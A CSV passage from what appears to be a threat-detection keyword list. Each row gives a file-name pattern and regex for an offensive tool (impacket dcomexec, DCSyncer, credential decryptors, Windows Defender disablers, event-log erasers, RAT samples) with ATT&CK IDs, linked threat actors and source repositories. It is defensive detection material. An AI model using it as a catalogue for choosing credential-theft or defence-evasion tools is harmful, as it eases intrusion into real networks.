"*\dcomexec.py*",".{0,1000}\\dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14815"
"*\dcomhijack.py*",".{0,1000}\\dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","14816"
"*\DCOMUploadExec.exe*",".{0,1000}\\DCOMUploadExec\.exe.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14817"
"*\DCOMUploadExec.sln*",".{0,1000}\\DCOMUploadExec\.sln.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14818"
"*\DCOMUploadExec-main*",".{0,1000}\\DCOMUploadExec\-main.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14819"
"*\dControl.exe*",".{0,1000}\\dControl\.exe.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14820"
"*\dControl.rar*",".{0,1000}\\dControl\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14821"
"*\DcRat.sln*",".{0,1000}\\DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","14822"
"*\dcrypt.exe*",".{0,1000}\\dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14823"
"*\dcrypt.sys*",".{0,1000}\\dcrypt\.sys.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14824"
"*\DCrypt\Bin*",".{0,1000}\\DCrypt\\Bin.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14825"
"*\dcrypt_setup.exe*",".{0,1000}\\dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14826"
"*\dcs_weak_kerberos_ciphersuite.txt*",".{0,1000}\\dcs_weak_kerberos_ciphersuite\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14827"
"*\dcshadow.html*",".{0,1000}\\dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14828"
"*\DCSyncer.sln*",".{0,1000}\\DCSyncer\.sln.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","14829"
"*\DCSyncer-master*",".{0,1000}\\DCSyncer\-master.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","14830"
"*\ddspoof.py*",".{0,1000}\\ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14832"
"*\DDSpoof\networking\*",".{0,1000}\\DDSpoof\\networking\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14833"
"*\DDSpoof\sniffers\*",".{0,1000}\\DDSpoof\\sniffers\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14834"
"*\deadPool.ps1*",".{0,1000}\\deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","14835"
"*\DeadPotato\pipe\epmapper*",".{0,1000}\\DeadPotato\\pipe\\epmapper.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#namedpipe","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","14836"
"*\Deamond RAT 1.2\*",".{0,1000}\\Deamond\sRAT\s1\.2\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14837"
"*\Debug\Injected.dll*",".{0,1000}\\Debug\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","14838"
"*\Debug\SharpDump.pdb*",".{0,1000}\\Debug\\SharpDump\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14839"
"*\Debug\SharpRoast.pdb*",".{0,1000}\\Debug\\SharpRoast\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14840"
"*\Debug\SharpWMI.pdb*",".{0,1000}\\Debug\\SharpWMI\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14841"
"*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14842"
"*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14843"
"*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14844"
"*\DecryptAutoLogon.sln*",".{0,1000}\\DecryptAutoLogon\.sln.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14845"
"*\DecryptAutoLogon.sln*",".{0,1000}\\DecryptAutoLogon\.sln.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14846"
"*\DecryptAutoLogon-main*",".{0,1000}\\DecryptAutoLogon\-main.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14847"
"*\decrypted.dmp*",".{0,1000}\\decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","14848"
"*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14849"
"*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14850"
"*\Decrypt-RDCMan.ps1*",".{0,1000}\\Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","14851"
"*\DecryptRDCManager.sln*",".{0,1000}\\DecryptRDCManager\.sln.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","14852"
"*\DecryptTeamViewer.exe*",".{0,1000}\\DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14853"
"*\DecryptTeamViewer.exe*",".{0,1000}\\DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14854"
"*\DecryptTeamViewer.pdb*",".{0,1000}\\DecryptTeamViewer\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14855"
"*\DecryptTeamViewer.sln*",".{0,1000}\\DecryptTeamViewer\.sln.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14856"
"*\DecryptTeamViewer-master*",".{0,1000}\\DecryptTeamViewer\-master.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14857"
"*\Defeat-Defender-V1.2.0-main*",".{0,1000}\\Defeat\-Defender\-V1\.2\.0\-main.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","14860"
"*\Defender Control.zip*",".{0,1000}\\Defender\sControl\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14861"
"*\defender-control.sln*",".{0,1000}\\defender\-control\.sln.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14862"
"*\defendercontrol.zip*",".{0,1000}\\defendercontrol\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14863"
"*\defender-control\dcontrol.cpp*",".{0,1000}\\defender\-control\\dcontrol\.cpp.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14864"
"*\defender-exclusions.ps1*",".{0,1000}\\defender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","14865"
"*\defenderOff.rar*",".{0,1000}\\defenderOff\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14866"
"*\DefenderRemover.exe*",".{0,1000}\\DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","14867"
"*\DefenderRemover-x86.exe*",".{0,1000}\\DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","14868"
"*\DelegationBOF.*",".{0,1000}\\DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","14869"
"*\Delete System32.exe*",".{0,1000}\\Delete\sSystem32\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14870"
"*\DeleteonReboot.exe*",".{0,1000}\\DeleteonReboot\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Schedules a file to be deleted on next Windows host reboot","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","14871"
"*\DeletePSscriptSignning.bat*",".{0,1000}\\DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14872"
"*\DeleteRecordbyGetHandle.cpp*",".{0,1000}\\DeleteRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14873"
"*\DeleteRecordbyGetHandle.exe*",".{0,1000}\\DeleteRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14874"
"*\DeleteRecordbyGetHandleEx.cpp*",".{0,1000}\\DeleteRecordbyGetHandleEx\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14875"
"*\DeleteRecordbyTerminateProcess.cpp*",".{0,1000}\\DeleteRecordbyTerminateProcess\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14876"
"*\DeleteRecordbyTerminateProcess.exe*",".{0,1000}\\DeleteRecordbyTerminateProcess\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14877"
"*\DeleteRecordbyTerminateProcessEx.cpp*",".{0,1000}\\DeleteRecordbyTerminateProcessEx\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14878"
